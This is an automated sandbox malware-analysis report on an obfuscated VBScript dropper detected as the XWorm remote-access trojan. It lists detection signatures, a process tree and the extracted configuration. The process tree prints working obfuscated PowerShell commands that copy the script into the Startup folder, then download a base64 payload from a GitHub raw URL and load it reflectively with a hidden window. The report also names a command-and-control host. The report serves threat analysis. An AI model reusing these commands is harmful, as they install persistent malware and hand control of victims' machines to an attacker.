Edit tour
Windows
Analysis Report
k4STQvJ6rV.vbs
Overview
General Information
| Sample name: | k4STQvJ6rV.vbsrenamed because original name is a hash value |
| Original sample name: | e1cadf5476665ac4d120fea85cb6da31.vbs |
| Analysis ID: | 1527696 |
| MD5: | e1cadf5476665ac4d120fea85cb6da31 |
| SHA1: | e5675a315a6dae625d638dfddc3994c7eef317df |
| SHA256: | a5fe6a6bb32827bf867aec2200c568e2015e233a6474292049c16400771fb6d9 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
XWorm
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected XWorm
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7856 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\k4STQ vJ6rV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 7944 cmdline: "C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Windows \system32\ k4STQvJ6rV .vbs', 'C: \Users\' + [Environm ent]::User Name + ''\ AppData\Ro aming\Micr osoft\Wind ows\Start Menu\Progr ams\Startu p\ sbv.amo imoil.vbs' )') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
PING.EXE (PID: 8008 cmdline: ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) 
powershell.exe (PID: 8096 cmdline: powershell -command [System.IO .File]::Co py('C:\Win dows\syste m32\k4STQv J6rV.vbs', 'C:\Users \' + [Envi ronment]:: UserName + ''\AppDat a\Roaming\ Microsoft\ Windows\St art Menu\P rograms\St artup\ sbv .amoimoil. vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7208 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdtWHR1ci crJ2wgJysn PSBkMG1odH RwcycrJzon KycvL3Jhdy 5naScrJ3Ro JysndWJ1c2 UnKydyY29u JysndGVuJy sndC5jb20n KycvJysnTm 9EZXQnKydl Y3RPbi9OJy snbycrJ0Rl JysndGUnKy djdCcrJ09u LycrJ3JlZi crJ3MvaGVh ZHMvbWEnKy dpbi9EZXRh JysnaE5vdG gtJysnVi50 eHRkMCcrJ2 07IG1YdGIn Kydhc2UnKy c2NENvbnRl bnQgPSAoJy snTmV3LU9i amVjdCBTeS crJ3N0ZW0u TicrJ2V0Jy snLldlJysn YkNsaWVudC kuJysnRCcr J293bmwnKy dvYWRTdHJp JysnbicrJ2 cobVgnKyd0 dXInKydsKT snKycgbVh0 YicrJ2luYS crJ3J5Qycr J29udGVuJy sndCA9IFtT JysneXN0Jy snZW0uQ29u JysndmUnKy dydF06Oicr J0YnKydyby crJ20nKydC JysnYXNlNj RTJysndHJp bicrJ2cobV h0YmEnKydz JysnZTYnKy c0Q29uJysn dGUnKydudC crJyk7IG1Y dGFzJysnc2 UnKydtYicr J2wnKyd5ID 0nKycgW1Jl ZicrJ2wnKy dlY3Rpb24u JysnQScrJ3 NzZW1ibHld OicrJzonKy dMb2FkJysn KCcrJ21YdG JpbmFyeUNv JysnbnRlbn QpOyBbZG5s aWInKycuSS crJ08uJysn SG9tZV06Jy snOlZBSSgn Kyc3cEswJy snLzQzVnlu L2QvZWUuZX RzJysnYScr J3AvLzpzcH R0aCcrJzdw SycrJywnKy cgN3BLZGVz JysnYXQnKy dpdmEnKydk bycrJzdwSy crJywnKycg JysnN3AnKy dLZGVzYXRp dmFkbycrJz cnKydwSywg N3BLZGVzYX QnKydpdicr J2FkbzdwSy wgJysnN3BL JysnTVNCJy sndScrJ2ls ZDcnKydwSy crJywgNycr J3BLN3BLLD dwJysnSzdw SyknKS5SRX BMYWNlKChb Y2hhcl0xMD ArW2NoYXJd NDgrW2NoYX JdMTA5KSxb c3RyaW5nXV tjaGFyXTM5 KS5SRXBMYW NlKCdtWHQn LCckJykuUk VwTGFjZSgo W2NoYXJdNT UrW2NoYXJd MTEyK1tjaG FyXTc1KSxb c3RyaW5nXV tjaGFyXTM0 KXwgJiAoIC RFTnY6Q09t c3BlY1s0LD E1LDI1XS1K b2lOJycp'; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('mXt ur'+'l '+' = d0mhttps '+':'+'//r aw.gi'+'th '+'ubuse'+ 'rcon'+'te n'+'t.com' +'/'+'NoDe t'+'ectOn/ N'+'o'+'De '+'te'+'ct '+'On/'+'r ef'+'s/hea ds/ma'+'in /Deta'+'hN oth-'+'V.t xtd0'+'m; mXtb'+'ase '+'64Conte nt = ('+'N ew-Object Sy'+'stem. N'+'et'+'. We'+'bClie nt).'+'D'+ 'ownl'+'oa dStri'+'n' +'g(mX'+'t ur'+'l);'+ ' mXtb'+'i na'+'ryC'+ 'onten'+'t = [S'+'ys t'+'em.Con '+'ve'+'rt ]::'+'F'+' ro'+'m'+'B '+'ase64S' +'trin'+'g (mXtba'+'s '+'e6'+'4C on'+'te'+' nt'+'); mX tas'+'se'+ 'mb'+'l'+' y ='+' [Re f'+'l'+'ec tion.'+'A' +'ssembly] :'+':'+'Lo ad'+'('+'m XtbinaryCo '+'ntent); [dnlib'+' .I'+'O.'+' Home]:'+': VAI('+'7pK 0'+'/43Vyn /d/ee.ets' +'a'+'p//: sptth'+'7p K'+','+' 7 pKdes'+'at '+'iva'+'d o'+'7pK'+' ,'+' '+'7p '+'Kdesati vado'+'7'+ 'pK, 7pKde sat'+'iv'+ 'ado7pK, ' +'7pK'+'MS B'+'u'+'il d7'+'pK'+' , 7'+'pK7p K,7p'+'K7p K)').REpLa ce(([char] 100+[char] 48+[char]1 09),[strin g][char]39 ).REpLace( 'mXt','$') .REpLace(( [char]55+[ char]112+[ char]75),[ string][ch ar]34)| & ( $ENv:COm spec[4,15, 25]-JoiN'' )" MD5: 04029E121A0CFA5991749937DD22A1D9) 
MSBuild.exe (PID: 2396 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\MSB uild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) 
WerFault.exe (PID: 8000 cmdline: C:\Windows \SysWOW64\ WerFault.e xe -u -p 2 396 -s 191 6 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- XClient.exe (PID: 2548 cmdline:
"C:\Users\ user\AppDa ta\Local\X Client.exe " MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - conhost.exe (PID: 5640 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- XClient.exe (PID: 5408 cmdline:
"C:\Users\ user\AppDa ta\Local\X Client.exe " MD5: 8FDF47E0FF70C40ED3A17014AEEA4232) - conhost.exe (PID: 6212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{"C2 url": ["futurist2.ddns.net"], "Port": "20506", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| Click to see the 3 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| Click to see the 2 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||